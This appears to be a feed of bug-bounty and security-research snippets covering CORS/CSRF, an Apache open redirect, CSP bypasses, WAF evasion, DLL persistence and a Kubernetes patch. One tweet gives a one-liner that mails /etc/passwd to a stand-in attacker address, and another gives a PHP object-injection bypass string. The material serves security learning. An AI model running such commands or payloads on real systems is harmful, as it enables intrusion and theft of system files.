Hi All,

This writeup is about the CORS Misconfiguration by which I was able to perform a CSRF attack to change other users account Info. The…

I recently came across the following Apache vulnerability
[https://httpd.apache.org/security/vulnerabilities_24.html]: "mod_rewrite
potential open redirect (CVE-2019-10098)", but I couldn't find a proof of
concept, so I started playing around with possible…

pseudo shell via email: echo "message body: $(cat /etc/passwd)" | mail -s "loot" attacker@example.com #BugBounty https://t.co/CUDFAgX2EV

Read More ›

Local Privilege Escalation in Rapid7’s Windows Insight IDR Agent by Florian Bogner With Insight IDR Rapid7 has created a very powerful, yet …

Hello friends, Here is Part 2 of Bug Hunting Writeup Summary ->

Title: PayPal Inc Bug Bounty - Arbitriary File Upload Vulnerability & Remote Code Execution
URL: https://www.vulnerability-lab.com/get_content.php?id=2180

Hi sobat, bagaimana kabarnya ? semoga senantiasa sehat selalu dan diberikan kelancaran dalam aktifitasnya. ^-^

Found HTML Injection in a web form but the CSP was blocking execution. I noticed *.google.com was allowed which is common for Google Analytics. Hosted an xss.js payload on Google Drive and found the raw download link. Passed that in to the script src location…

Encoder to bypass WAF filters using XOR operations. - devploit/XORpass

Task Scheduler service loads a non-existing DLL enabling persistence as `NT AUTHORITY\SYSTEM`.

POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip

Bypassing CSRF Header Protection and HTTPOnly Cookie

Hello everybody!

A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites. - zigoo0/JSONBee

We highly recommend upgrading to Kubernetes builds 1.14.8, 1.15.5 or 1.16.2 to address two recently patched Kubernetes vulnerabilities.